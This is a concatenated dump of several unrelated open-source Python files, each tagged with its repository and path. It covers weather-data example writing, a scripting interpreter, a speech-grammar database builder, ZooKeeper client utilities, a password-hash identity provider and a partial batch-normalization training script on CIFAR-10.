storm_times_unix_sec=these_storm_times_unix_sec,
target_matrix=this_target_matrix,
sounding_file_name=this_sounding_file_name,
sounding_field_names=None)
elif num_file_dimensions == 3:
this_example_dict = _create_3d_examples(
radar_file_name_matrix=radar_file_name_matrix[i, ...],
full_id_strings=these_full_id_strings,
storm_times_unix_sec=these_storm_times_unix_sec,
target_matrix=this_target_matrix,
sounding_file_name=this_sounding_file_name,
sounding_field_names=None)
else:
this_example_dict = _create_2d_examples(
radar_file_names=radar_file_name_matrix[i, ...].tolist(),
full_id_strings=these_full_id_strings,
storm_times_unix_sec=these_storm_times_unix_sec,
target_matrix=this_target_matrix,
sounding_file_name=this_sounding_file_name,
sounding_field_names=None)
print('\n')
if this_example_dict is None:
continue
this_example_dict.update({TARGET_NAMES_KEY: target_names})
this_output_file_name = spc_date_to_out_file_dict[this_spc_date_string]
print('Writing examples to: "{0:s}"...'.format(this_output_file_name))
write_example_file(
netcdf_file_name=this_output_file_name,
example_dict=this_example_dict,
append_to_file=os.path.isfile(this_output_file_name)
)
| thunderhoser/GewitterGefahr | gewittergefahr/deep_learning/input_examples.py | Python | mit | 103,640 |
import os
import re
import sys
import json
import shlex
import logging
import inspect
import functools
import importlib
from pprint import pformat
from collections import namedtuple
from traceback import format_tb
from requests.exceptions import RequestException
import strutil
from cachely.loader import Loader
from .lib import library, interpreter_library, DataProxy
from . import utils
from . import core
from . import exceptions
logger = logging.getLogger(__name__)
BASE_LIBS = ['snagit.lib.text', 'snagit.lib.lines', 'snagit.lib.soup']
ReType = type(re.compile(''))
class Instruction(namedtuple('Instruction', 'cmd args kws line lineno')):
'''
``Instruction``'s take the form::
command [arg [arg ...]] [key=arg [key=arg ...]]
Where ``arg`` can be one of: single quoted string, double quoted string,
digit, True, False, None, or a simple, unquoted string.
'''
values_pat = r'''
[rj]?'(?:(\'|[^'])*?)' |
[r]?"(?:(\"|[^"])*?)" |
(\d+) |
(True|False|None) |
([^\s,]+)
'''
args_re = re.compile(
r'''^(
(?P<kwd>\w[\w\d-]*)=(?P<val>{0}) |
(?P<arg>{0}|([\s,]+))
)\s*'''.format(values_pat),
re.VERBOSE
)
value_dict = {'True': True, 'False': False, 'None': None}
def __str__(self):
def _repr(w):
if isinstance(w, ReType):
return 'r"{}"'.format(str(w.pattern))
return repr(w)
return '{}{}{}'.format(
self.cmd.upper(),
' {}'.format(
' '.join([_repr(c) for c in self.args]) if self.args else ''
),
' {}'.format(' '.join(
'{}={}'.format(k, _repr(v)) for k, v in self.kws.items()
) if self.kws else '')
)
@classmethod
def get_value(cls, s):
if s.isdigit():
return int(s)
elif s in cls.value_dict:
return cls.value_dict[s]
elif s.startswith(('r"', "r'")):
return re.compile(utils.escaped(s[2:-1]))
elif s.startswith("j'"):
return json.loads(utils.escaped(s[2:-1]))
elif s.startswith(('"', "'")):
return utils.escaped(s[1:-1])
else:
return s.strip()
@classmethod
def parse(cls, line, lineno):
args = []
kws = {}
cmd, text = strutil.splitter(line, expected=2, strip=True)
cmd = cmd.lower()
while text:
m = cls.args_re.search(text)
if not m:
break
gdict = m.groupdict()
kwd = gdict.get('kwd')
if kwd:
kws[kwd] = cls.get_value(gdict.get('val', ''))
else:
arg = gdict.get('arg', '').strip()
if arg != ',':
args.append(cls.get_value(arg))
text = text[len(m.group()):]
if text:
raise SyntaxError(
'Syntax error: "{}" (line {})'.format(text, lineno)
)
return cls(cmd, args, kws, line, lineno)
def lexer(code, lineno=0):
'''
Takes the script source code, scans it, and lexes it into
``Instructions``
'''
for chars in code.splitlines():
lineno += 1
line = chars.rstrip()
if not line or line.lstrip().startswith('#'):
continue
logger.debug('Lexed {} byte(s) line {}'.format(len(line), chars))
yield Instruction.parse(line, lineno)
def load_libraries(extensions=None):
if isinstance(extensions, str):
extensions = [extensions]
libs = BASE_LIBS + (extensions or [])
for lib in libs:
importlib.import_module(lib)
class Interpreter:
def __init__(
self,
contents=None,
loader=None,
use_cache=False,
do_pm=False,
extensions=None
):
self.use_cache = use_cache
self.loader = loader if loader else Loader(use_cache=use_cache)
self.contents = Contents(contents)
self.do_debug = False
self.do_pm = do_pm
self.instructions = []
load_libraries(extensions)
def load_sources(self, sources, use_cache=None):
use_cache = self.use_cache if use_cache is None else bool(use_cache)
contents = self.loader.load_sources(sources)
self.contents.update([
ct.decode() if isinstance(ct, bytes) else ct for ct in contents
])
def listing(self, linenos=False):
items = []
for instr in self.instructions:
items.append('{}{}'.format(
'{} '.format(instr.lineno) if linenos else '',
instr.line
))
return items
def lex(self, code):
lineno = self.instructions[-1].lineno if self.instructions else 0
instructions = list(lexer(code, lineno))
self.instructions.extend(instructions)
return instructions
def execute(self, code):
for instr in self.lex(code):
try:
self._execute_instruction(instr)
except exceptions.ProgramWarning as why:
print(why)
return self.contents
def _load_handler(self, instr):
if instr.cmd in library.registry:
func = library.registry[instr.cmd]
return self.contents, (func, instr.args, instr.kws)
elif instr.cmd in interpreter_library.registry:
func = interpreter_library.registry[instr.cmd]
return func, (self, instr.args, instr.kws)
raise exceptions.ProgramWarning(
'Unknown instruction (line {}): {}'.format(instr.lineno, instr.cmd)
)
def _execute_instruction(self, instr):
logger.debug('Executing {}'.format(instr.cmd))
handler, args = self._load_handler(instr)
do_debug, self.do_debug = self.do_debug, False
if do_debug:
utils.pdb.set_trace()
try:
handler(*args)
except Exception:
exc, value, tb = sys.exc_info()
if self.do_pm:
logger.error(
'Script exception, line {}: {} (Entering post_mortem)'.format( # noqa
instr.lineno,
value
)
)
utils.pdb.post_mortem(tb)
else:
raise
def execute_script(filename, contents=''):
code = utils.read_file(filename)
return execute_code(code, contents)
def execute_code(code, contents=''):
intrep = Interpreter(contents)
return str(intrep.execute(code))
class Contents:
def __init__(self, contents=None):
self.stack = []
self.set_contents(contents)
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len(self.contents)
def __str__(self):
return '\n'.join(str(c) for c in self)
# def __getitem__(self, index):
# return self.contents[index]
def pop(self):
if self.stack:
self.contents = self.stack.pop()
def __call__(self, func, args, kws):
contents = []
for data in self:
result = func(data, args, kws)
contents.append(result)
self.update(contents)
def merge(self):
if self.contents:
first = self.contents[0]
data = first.merge(self.contents)
self.update([data])
def update(self, contents):
if self.contents:
self.stack.append(self.contents)
self.set_contents(contents)
def set_contents(self, contents):
self.contents = []
if isinstance(contents, (str, bytes)):
contents = [contents]
contents = contents or []
for ct in contents:
if isinstance(ct, (str, bytes)):
ct = DataProxy(ct)
self.contents.append(ct)
| dakrauth/snarf | snagit/core.py | Python | mit | 7,965 |
import antlr3;
import sqlite3;
import pickle;
import sys, os;
import re;
from SpeakPython.SpeakPython import SpeakPython;
from SpeakPython.SpeakPythonLexer import SpeakPythonLexer;
from SpeakPython.SpeakPythonParser import SpeakPythonParser;
#sort results based on length of labels
def sortResults(results):
l = len(results);
if l == 1 or l == 0:
return results;
s1 = sortResults(results[:l/2]);
s2 = sortResults(results[l/2:]);
res = [];
si1 = 0;
si2 = 0;
sl1 = len(s1);
sl2 = len(s2);
max = sl1 + sl2;
for i in range(0, max):
if si1 == sl1:
res.extend(s2[si2:]);
break;
if si2 == sl2:
res.extend(s1[si1:]);
break;
if len(s1[si1].labels) > len(s2[si2].labels):
res.append( s1[si1] );
si1 += 1;
else:
res.append( s2[si2] );
si2 += 1;
return res;
def makeDB(conn):
c = conn.cursor();
try:
c.execute("DROP TABLE matches");
c.execute("DROP TABLE functions");
c.execute("DROP TABLE kleene")
conn.commit();
except Exception as e:
conn.rollback();
c.execute("CREATE TABLE matches (order_id INTEGER PRIMARY KEY, keywords TEXT, regex TEXT, results BLOB)");
c.execute("CREATE TABLE functions (name TEXT, regex TEXT, results BLOB)");
c.execute("CREATE TABLE kleene (id TEXT PRIMARY KEY, regexes BLOB)");
#index the keywords to speed up text search
c.execute("CREATE INDEX IF NOT EXISTS keyword_idx ON matches (keywords)");
c.execute("CREATE INDEX IF NOT EXISTS func_name_idx ON functions (name)");
conn.commit();
def performTestCases(exp, testCases):
print "Testing: ", exp
for t in testCases:
m = re.match(exp, t);
if m == None:
print "Test case failed: ", t;
return False;
return True;
def insertIntoDB(conn, matches, functions):
matchEntries = [];
kleeneEntries = [];
funcEntries = [];
print "Running test cases for matches...";
idCount = 0;
for m in matches:
#perform in-suite test cases
succeededTests = performTestCases(m.exp, m.testCases);
if not succeededTests:
return;
k = ','.join(m.keywords);
m.results = sortResults(m.results);
if len(m.kGroupRegexes) > 0:
kleeneEntries.append((str(idCount), pickle.dumps(m.kGroupRegexes)));
matchEntries.append((idCount, k, m.exp, pickle.dumps(m.results)));
idCount += 1;
print "All match test cases passed.";
c = conn.cursor();
c.executemany("INSERT INTO matches VALUES (?,?,?,?)", matchEntries);
conn.commit();
print "Running test cases for functions...";
for f in functions:
f = functions[f];
#perform in-suite test cases
succeededTests = performTestCases(f, f.testCases);
if not succeededTests:
return;
#save all regex groups in database under function name
if len(f.kGroupRegexes) > 0:
kleeneEntries.append((f.getName(), pickle.dumps(f.kGroupRegexes)));
f.results = sortResults(f.results);
funcEntries.append((f.getName(), f.getExp(), pickle.dumps(f.getResults())));
print "All function test cases passed";
c.executemany("INSERT INTO functions VALUES (?,?,?)", funcEntries);
c.executemany("INSERT INTO kleene VALUES (?,?)", kleeneEntries);
conn.commit();
print "Functions:";
for row in c.execute("SELECT * FROM functions"):
print row, '\n';
print "\n";
print "Matches:";
for row in c.execute("SELECT * FROM matches"):
print row, '\n';
print "\n";
print "Kleene:";
for row in c.execute("SELECT * FROM kleene"):
print row, '\n';
print "\n";
conn.close();
def parse(conn, fileList, dirName):
parser = None;
otherGlobalTests = {};
for f in fileList:
#join filename with current directory path
fileName = os.path.join(dirName, f);
#if f is a file, parse and insert into db
if os.path.isfile(fileName):
char_stream = antlr3.ANTLRFileStream(fileName);
lexer = SpeakPythonLexer(char_stream);
tokens = antlr3.CommonTokenStream(lexer);
# for t in lexer:
# print t;
parser = SpeakPythonParser(tokens);
parser.prog();
insertIntoDB(conn, parser.matches, parser.aliases);
#if f is a dir, pass list of files into recursive call
if os.path.isdir(fileName):
subFiles = os.listdir(fileName);
otherGlobalTests = parse(conn, subFiles, fileName);
globalTests = {};
if parser == None:
print "Parser not defined."
else:
globalTests = parser.globalTests;
globalTests.update(otherGlobalTests);
return globalTests;
def main(argv):
name = argv[1] + '.db';
conn = sqlite3.connect(name);
makeDB(conn);
globalTests = parse(conn, [argv[2]], '');
for gt in globalTests:
sp = SpeakPython(name);
r = sp.matchResult(gt);
resultStr = '';
if r != None:
resultStr = r.getResult();
if resultStr != globalTests[gt]:
print "Value test case failed: (" + gt + ") does not return (" + globalTests[gt] + "), but instead returns (" + resultStr + ")";
main(sys.argv);
| netgio/voicecount | devicecode/SpeakPythonMakeDB.py | Python | mit | 4,765 |
from __future__ import unicode_literals
from __future__ import print_function
import socket
import time
import six
import math
import threading
from random import choice
import logging
from kazoo.client import KazooClient
from kazoo.client import KazooState
from kazoo.protocol.states import EventType
from kazoo.handlers.threading import KazooTimeoutError
from kazoo.exceptions import OperationTimeoutError
log = logging.getLogger(__name__)
MODE_LEADER = 'leader'
CONNECTION_CACHE_ENABLED = True
CONNECTION_CACHE = {}
def kazoo_client_cache_enable(enable):
"""
You may disable or enable the connection cache using this function.
The connection cache reuses a connection object when the same connection parameters
are encountered that have been used previously. Because of the design of parts of this program
functionality needs to be independent and uncoupled, which means it needs to establish its own
connections.
Connections to Zookeeper are the most time consuming part of most interactions so caching
connections enables much faster running of tests health checks, etc.
"""
global CONNECTION_CACHE_ENABLED
CONNECTION_CACHE_ENABLED = enable
def kazoo_client_cache_serialize_args(kwargs):
'''
Returns a hashable object from keyword arguments dictionary.
This hashable object can be used as the key in another dictionary.
:param kwargs: a dictionary of connection parameters passed to KazooClient
Supported connection parameters::
hosts - Comma-separated list of hosts to connect to (e.g. 127.0.0.1:2181,127.0.0.1:2182,[::1]:2183).
timeout - The longest to wait for a Zookeeper connection.
client_id - A Zookeeper client id, used when re-establishing a prior session connection.
handler - An instance of a class implementing the IHandler interface for callback handling.
default_acl - A default ACL used on node creation.
auth_data - A list of authentication credentials to use for the connection.
Should be a list of (scheme, credential) tuples as add_auth() takes.
read_only - Allow connections to read only servers.
randomize_hosts - By default randomize host selection.
connection_retry - A kazoo.retry.KazooRetry object to use for retrying the connection to
Zookeeper. Also can be a dict of options which will be used for creating one.
command_retry - A kazoo.retry.KazooRetry object to use for the KazooClient.retry() method.
Also can be a dict of options which will be used for creating one.
logger - A custom logger to use instead of the module global log instance.
'''
return frozenset(kwargs.items())
def kazoo_client_cache_get(kwargs):
if CONNECTION_CACHE_ENABLED:
return CONNECTION_CACHE.get(kazoo_client_cache_serialize_args(kwargs))
def kazoo_client_cache_put(kwargs, client):
global CONNECTION_CACHE
CONNECTION_CACHE[kazoo_client_cache_serialize_args(kwargs)] = client
def kazoo_clients_connect(clients, timeout=5, continue_on_error=False):
"""
Connect the provided Zookeeper client asynchronously.
This is the fastest way to connect multiple clients while respecting a timeout.
:param clients: a sequence of KazooClient objects or subclasses of.
:param timeout: connection timeout in seconds
:param continue_on_error: don't raise exception if SOME of the hosts were able to connect
"""
asyncs = []
for client in clients:
# returns immediately
asyncs.append(client.start_async())
tstart = time.time()
while True:
elapsed = time.time() - tstart
remaining = math.ceil(max(0, timeout - elapsed))
connecting = [async for idx, async in enumerate(asyncs) if not clients[idx].connected]
connected_ct = len(clients) - len(connecting)
if not connecting:
# successful - all hosts connected
return connected_ct
if not remaining:
# stop connection attempt for any client that timed out.
for client in clients:
if client.connected:
continue
else:
client.stop()
if len(connecting) < len(clients):
# if some of the clients connected, return the ones that are connected
msg = 'Connection Timeout - %d of %d clients timed out after %d seconds' % (
len(connecting),
len(clients),
timeout
)
if continue_on_error:
log.warn(msg)
return connected_ct
else:
OperationTimeoutError(msg)
raise OperationTimeoutError('All hosts timed out after %d secs' % timeout)
# Wait the remaining amount of time to connect
# note that this will wait UP TO remaining, but will only wait as long as it takes
# to connect.
connecting[0].wait(remaining)
def kazoo_clients_from_client(kazoo_client):
"""
Construct a series of KazooClient connection objects from a single KazooClient instance
A client will be constructed per host within the KazooClient, so if the KazooClient was
constructed with 3 hosts in its connection string, 3 KazooClient instanctes will be returned
The class constructed will be the same type as is passed in kazoo_client, this functionality
is so that this method will work with mocked connection objects or customized subclasses of
KazooClient.
"""
# TODO support all connection arguments
connection_strings = zk_conns_from_client(kazoo_client)
cls = kazoo_client.__class__
clients = []
for conn_str in connection_strings:
args = {'hosts': conn_str}
client = kazoo_client_cache_get(args)
if not client:
client = cls(**args)
kazoo_client_cache_put(args, client)
clients.append(client)
return clients
def get_leader(zk_hosts):
# TODO refactor me to accept KazooClient object.
for host in zk_hosts:
zk = KazooClient(hosts=host, read_only=True)
try:
zk.start()
except KazooTimeoutError as e:
print('ZK Timeout host: [%s], %s' % (host, e))
continue
properties_str = zk.command(cmd=b'srvr')
properties = properties_str.split('\n')
for line in properties:
if not line.strip().lower().startswith('mode:'):
continue
key, val = line.split(':')
if val.strip().lower() == MODE_LEADER:
return host
zk.stop()
raise RuntimeError('no leader available, from connections given')
def get_server_by_id(zk_hosts, server_id):
# TODO refactor me to accept KazooClient object.
if not isinstance(server_id, int):
raise ValueError('server_id must be int, got: %s' % type(server_id))
for host in zk_hosts:
zk = KazooClient(hosts=host, read_only=True)
try:
zk.start()
except KazooTimeoutError as e:
print('ZK Timeout host: [%s], %s' % (host, e))
continue
properties_str = zk.command(cmd=b'conf')
properties = properties_str.split('\n')
for line in properties:
if not line.strip().lower().startswith('serverid='):
continue
key, val = line.split('=')
val = int(val)
if val == server_id:
return host
continue
zk.stop()
raise ValueError("no host available with that server id [%d], from connections given" % server_id)
def zk_conn_from_client(kazoo_client):
"""
Make a Zookeeper connection string from a KazooClient instance
"""
hosts = kazoo_client.hosts
chroot = kazoo_client.chroot
return zk_conn_from_hosts(hosts, chroot)
def zk_conns_from_client(kazoo_client):
"""
Make a Zookeeper connection string per-host from a KazooClient instance
"""
hosts = kazoo_client.hosts
chroot = kazoo_client.chroot
return zk_conns_from_hosts(hosts, chroot)
def zk_conn_from_hosts(hosts, chroot=None):
"""
Make a Zookeeper connection string from a list of (host,port) tuples.
"""
if chroot and not chroot.startswith('/'):
chroot = '/' + chroot
return ','.join(['%s:%s' % (host,port) for host, port in hosts]) + chroot or ''
def zk_conns_from_hosts(hosts, chroot=None):
"""
Make a list of Zookeeper connection strings one her host.
"""
if chroot and not chroot.startswith('/'):
chroot = '/' + chroot
return ['%s:%s' % (host,port) + chroot or '' for host, port in hosts]
def parse_zk_conn(zookeepers):
"""
Parse Zookeeper connection string into a list of fully qualified connection strings.
"""
zk_hosts, root = zookeepers.split('/') if len(zookeepers.split('/')) > 1 else (zookeepers, None)
zk_hosts = zk_hosts.split(',')
root = '/'+root if root else ''
all_hosts_list = [h+root for h in zk_hosts]
return all_hosts_list
def parse_zk_hosts(zookeepers, all_hosts=False, leader=False, server_id=None):
"""
Returns [host1, host2, host3]
Default behavior is to return a single host from the list chosen by random (a list of 1)
:param all_hsots: if true, all hosts will be returned in a list
:param leader: if true, return the ensemble leader host
:param server_id: if provided, return the host with this server id (integer)
"""
zk_hosts, root = zookeepers.split('/') if len(zookeepers.split('/')) > 1 else (zookeepers, None)
zk_hosts = zk_hosts.split(',')
root = '/'+root if root else ''
all_hosts_list = [h+root for h in zk_hosts]
if leader:
zk_hosts = [get_leader(zk_hosts)]
elif server_id:
zk_hosts = [get_server_by_id(zk_hosts, server_id)]
# make a list of each host individually, so they can be queried one by one for statistics.
elif all_hosts:
zk_hosts = all_hosts_list
# otherwise pick a single host to query by random.
else:
zk_hosts = [choice(zk_hosts) + root]
return zk_hosts
def text_type(string, encoding='utf-8'):
"""
Given text, or bytes as input, return text in both python 2/3
This is needed because the arguments to six.binary_type and six.text_type change based on
if you are passing it text or bytes, and if you simply pass bytes to
six.text_type without an encoding you will get output like: ``six.text_type(b'hello-world')``
which is not desirable.
"""
if isinstance(string, six.text_type):
return six.text_type(string)
else:
return six.text_type(string, encoding)
netcat_lock = threading.Lock()
def netcat(hostname, port, content, timeout=5):
"""
Operate similary to netcat command in linux (nc).
Thread safe implementation
"""
# send the request
content = six.binary_type(content)
try:
with netcat_lock:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, int(port)))
sock.settimeout(timeout)
sock.sendall(content)
except socket.timeout as e:
raise IOError("connect timeout: %s calling [%s] on [%s]" % (e, content, hostname))
except socket.error as e: # subclass of IOError
raise IOError("connect error: %s calling [%s] on [%s]" % (e, content, hostname))
response = ''
started = time.time()
while True:
if time.time() - started >= timeout:
raise IOError("timed out retrieving data from: %s" % hostname)
# receive the response
try:
# blocks until there is data on the socket
with netcat_lock:
msg = sock.recv(1024)
response += text_type(msg)
except socket.timeout as e:
raise IOError("%s calling [%s] on [%s]" % (e, content, hostname))
except socket.error as e:
raise IOError("%s calling [%s] on [%s]" % (e, content, hostname))
if len(msg) == 0:
try:
with netcat_lock:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except OSError:
pass
finally:
break
response = text_type(response)
return response
| bendemott/solr-zkutil | solrzkutil/util.py | Python | mit | 13,103 |
from turbogears.identity.soprovider import *
from secpwhash import check_password
class SoSecPWHashIdentityProvider(SqlObjectIdentityProvider):
def validate_password(self, user, user_name, password):
# print >>sys.stderr, user, user.password, user_name, password
return check_password(user.password,password)
| edwardsnj/rmidb2 | rmidb2/sosecpwhashprovider.py | Python | mit | 317 |
#!/usr/bin/env python
from __future__ import print_function
"""
Batch Normalization + SVRG on MNIST
Independent Study
May 24, 2016
Yintai Ma
"""
"""
# Use SGD AdaGrad instead
"""
"""
under folder of batch_normalization
Before merge; number 1
have options for "mlp", "mlpbn"; "sgd" and "custom_svrg2" and "sgd_adagrad"
"""
import sys
import os
import time
import matplotlib
import matplotlib.pyplot as plt
# parameters for Linux
plt.switch_backend('agg')
import pylab
#THEANO_FLAGS='floatX=float32,device=gpu0,mode=FAST_RUN'
import numpy as np
import theano
import theano.tensor as T
import lasagne
import pickle
import gzip
import my_bn_layer # Define DBN, e.g., DBN1
import my_bn_layer2 # Define DBN2, e.g. ,1/m^2 MA
import my_bn_layer_const # Define for const alpha (actually we can just use the my_bn_layer)
# import my_bn_layer_5_10_m # Define DBN2, e.g. ,5/10+m MA
from collections import OrderedDict
# May 18, 2016, Yintai Ma
# standard setting , epoch = 500, batch size = 100
OUTPUT_FIGURE_PATH = 'data_large/'
OUTPUT_DATA_PATH = 'data_large/'
NUM_EPOCHS = 20
BATCH_SIZE = 100
NUM_HIDDEN_UNITS = 500
LEARNING_RATE = 0.01
MOMENTUM = 0.9
FREQUENCY = 0.1
MODEL = 'mlpbn'
GRADIENT = 'sgd_adagrad'
BNALG = 'original'
bnalg_const_dict = {
"const1": 1.0,
"const075": 0.75,
"const05": 0.5,
"const025": 0.25,
"const01": 0.1,
"const001": 0.01,
"const0001": 0.001,
"const0": 0.0, }
# ################## Download and prepare the MNIST dataset ##################
# This is just some way of getting the MNIST dataset from an online location
# and loading it into numpy arrays. It doesn't involve Lasagne at all.
def custom_svrg2(loss, params, m, learning_rate=0.01, objective=None, data=None, target=None, getpred=None):
theano.pp(loss)
grads = theano.grad(loss, params)
n = data.shape[0]
updates = OrderedDict()
rng = T.shared_randomstreams.RandomStreams(seed=149)
for param, grad in zip(params, grads):
value = param.get_value(borrow=True)
mu = grad / n
def oneStep(w):
t = rng.choice(size=(1,), a=n)
loss_part_tilde = objective(getpred(data[t], param), target[t])
loss_part_tilde = loss_part_tilde.mean()
g_tilde = theano.grad(loss_part_tilde, param)
loss_part = objective(getpred(data[t], w), target[t])
loss_part = loss_part.mean()
g = theano.grad(loss_part, w)
w = w - learning_rate * (g - g_tilde + mu)
return w
w_tilde, scan_updates = theano.scan(fn=oneStep, outputs_info=param, n_steps=m)
updates.update(scan_updates)
updates[param] = w_tilde[-1]
return updates
def mysgd(loss_or_grads, params, learning_rate):
grads = lasagne.updates.get_or_compute_grads(loss_or_grads, params)
updates = OrderedDict()
for param, grad in zip(params, grads):
updates[param] = param - learning_rate * grad
return updates
def mysgd_adagrad(loss_or_grads, params, learning_rate=0.01, eps=1.0e-8):
if not isinstance(loss_or_grads, list):
grads = theano.grad(loss_or_grads, params)
else:
grads = loss_or_grads
updates = OrderedDict()
for param, grad in zip(params, grads):
value = param.get_value(borrow=True)
acc = theano.shared(np.zeros(value.shape, dtype=value.dtype), broadcastable=param.broadcastable)
acc_new = acc + grad ** 2
updates[acc] = acc_new
updates[param] = param - learning_rate * grad / T.sqrt(acc_new + eps)
return updates
def mysvrg(loss_or_grads, params, learning_rate,avg_gradient):
#Not Working right now
grads = lasagne.updates.get_or_compute_grads(loss_or_grads, params)
updates = OrderedDict()
for param, grad in zip(params, grads):
updates[param] = param - learning_rate * (grad- grad_it + avg_gradient[param])
return updates
def load_dataset():
# We first define a download function, supporting both Python 2 and 3.
if sys.version_info[0] == 2:
from urllib import urlretrieve
else:
from urllib.request import urlretrieve
CIFAR_PATH = "../../data/cifar-10-batches-py/"
def load_CIFAR_batch(filename):
""" load single batch of cifar """
with open(filename, 'rb') as f:
datadict = pickle.load(f)
X = datadict['data']
Y = datadict['labels']
# print X.shape
#X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype("float")
X = X.reshape(10000, 3, 32, 32).transpose(0,1,2,3).astype("float32")
Y = np.array(Y).astype("int32")
return X, Y
# We can now download and read the training and test set images and labels.
# X_train = load_mnist_images('train-images-idx3-ubyte.gz')
# y_train = load_mnist_labels('train-labels-idx1-ubyte.gz')
# X_test = load_mnist_images('t10k-images-idx3-ubyte.gz')
# y_test = load_mnist_labels('t10k-labels-idx1-ubyte.gz')
# Read NI dataset
# DATA_PATH = "/Users/myt007/git/svrg/ni/"
X_train1,y_train1 = load_CIFAR_batch(CIFAR_PATH + "data_batch_1")
X_train2,y_train2 = load_CIFAR_batch(CIFAR_PATH + "data_batch_2")
X_train3,y_train3 = load_CIFAR_batch(CIFAR_PATH + "data_batch_3")
X_train4,y_train4 = load_CIFAR_batch(CIFAR_PATH + "data_batch_4")
X_train5,y_train5 = load_CIFAR_batch(CIFAR_PATH + "data_batch_5")
X_test,y_test = load_CIFAR_batch(CIFAR_PATH + "test_batch")
X_train = np.concatenate((X_train1,X_train2,X_train3,X_train4,X_train5))
y_train = np.concatenate((y_train1,y_train2,y_train3,y_train4,y_train5))
# We reserve the last 10000 training examples for validation.
X_train, X_val = X_train[:-10000], X_train[-10000:]
y_train, y_val = y_train[:-10000], y_train[-10000:]
X_train = X_train.astype("float32")
X_val = X_val.astype("float32")
X_test = X_test.astype("float32")
y_train = y_train.astype("int32")
y_val = y_val.astype("int32")
y_test = y_test.astype("int32")
# We just return all the arrays in order, as expected in main().
# (It doesn't matter how we do this as long as we can read them again.)
# print("X_train1")
# print(X_train1.shape)
# print(X_train1.dtype)
# print("\n")
# print("y_train1")
# print(y_train1.shape)
# print("X_train")
# print(X_train.shape)
# print(X_train.dtype)
# print("\n")
# print("y_train")
# print(y_train.shape)
# # print("X_val")
# # print(X_val.shape)
# # print("y_val")
# # print(y_val.shape)
# print("X_test")
# print(X_test.shape)
# print("y_test")
# print(y_test.shape)
return X_train, y_train, X_val, y_val, X_test, y_test
# ##################### Build the neural network model #######################
# This script supports three types of models. For each one, we define a
# function that takes a Theano variable representing the input and returns
# the output layer of a neural network model built in Lasagne.
def build_mlp(input_var=None, num_hidden_units=NUM_HIDDEN_UNITS):
l_in = lasagne.layers.InputLayer(shape=(None, 3, 32, 32),
input_var=input_var)
l_hid = lasagne.layers.DenseLayer(
l_in, num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
W=lasagne.init.GlorotUniform())
l_hid = lasagne.layers.DenseLayer(
l_hid, num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
W=lasagne.init.GlorotUniform())
l_out = lasagne.layers.DenseLayer(
l_hid, num_units=10,
nonlinearity=lasagne.nonlinearities.softmax)
return l_out
def build_mlpbn(input_var=None, num_hidden_units=NUM_HIDDEN_UNITS,bnalg = BNALG):
l_in = lasagne.layers.InputLayer(shape=(None, 3, 32, 32),
input_var=input_var)
if bnalg == 'original':
l_hidden = lasagne.layers.batch_norm (
lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
l_hidden = lasagne.layers.batch_norm (
lasagne.layers.DenseLayer(
l_hidden,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
elif bnalg == 'dbn':
l_hidden = my_bn_layer.my_batch_norm (
lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
l_hidden = my_bn_layer.my_batch_norm (
lasagne.layers.DenseLayer(
l_hidden,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
elif bnalg == 'dbn2':
l_hidden = my_bn_layer2.my_batch_norm (
lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
l_hidden = my_bn_layer2.my_batch_norm (
lasagne.layers.DenseLayer(
l_hidden,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
elif 'const' in bnalg:
# print(bnalg)
# print(bnalg_const_dict)
if bnalg not in bnalg_const_dict:
print("Incorrect bnalg method. Can't find in predefined dictionary.")
else:
the_alpha = bnalg_const_dict[bnalg]
l_hidden = my_bn_layer_const.my_batch_norm (
lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
), alpha = the_alpha
)
l_hidden = my_bn_layer_const.my_batch_norm (
lasagne.layers.DenseLayer(
l_hidden,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
), alpha = the_alpha
)
l_out = lasagne.layers.DenseLayer(
l_hidden,
num_units=NUM_HIDDEN_UNITS,
nonlinearity=lasagne.nonlinearities.softmax,
)
return l_out
# ############################# Batch iterator ###############################
# This is just a simple helper function iterating over training data in
# mini-batches of a particular size, optionally in random order. It assumes
# data is available as numpy arrays. For big datasets, you could load numpy
# arrays as memory-mapped files (np.load(..., mmap_mode='r')), or write your
# own custom data iteration function. For small datasets, you can also copy
# them to GPU at once for slightly improved performance. This would involve
# several changes in the main program, though, and is not demonstrated here.
def iterate_minibatches(inputs, targets, batchsize, shuffle=False ):
assert len(inputs) == len(targets)
if shuffle:
indices = np.arange(len(inputs))
np.random.shuffle(indices)
for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
if shuffle:
excerpt = indices[start_idx:start_idx + batchsize]
else:
excerpt = slice(start_idx, start_idx + batchsize)
yield inputs[excerpt], targets[excerpt]
# ############################## Main program ################################
# Everything else will be handled in our main program now. We could pull out
# more functions to better separate the code, but it wouldn't make it any
# easier to read.
def main(model=MODEL,gradient = GRADIENT, num_epochs=NUM_EPOCHS, num_hidden_units = NUM_HIDDEN_UNITS, bnalg = BNALG):
rng = np.random.RandomState(42)
lasagne.random.set_rng(rng)
# Load the dataset
NUM_EPOCHS = num_epochs
print("Loading data...")
X_train, y_train, X_val, y_val, X_test, y_test = load_dataset()
# Prepare Theano variables for inputs and targets
input_var = T.tensor4('inputs')
target_var = T.ivector('targets')
# Create neural network model (depending on first command line parameter)
print("Building model and compiling functions...")
if model == 'mlp':
network = build_mlp(input_var, num_hidden_units)
elif model == 'mlpbn':
network = build_mlpbn(input_var, num_hidden_units,bnalg)
else:
print("Unrecognized model type %r." % model)
return
prediction = lasagne.layers.get_output(network, deterministic= False, batch_norm_update_averages = True)
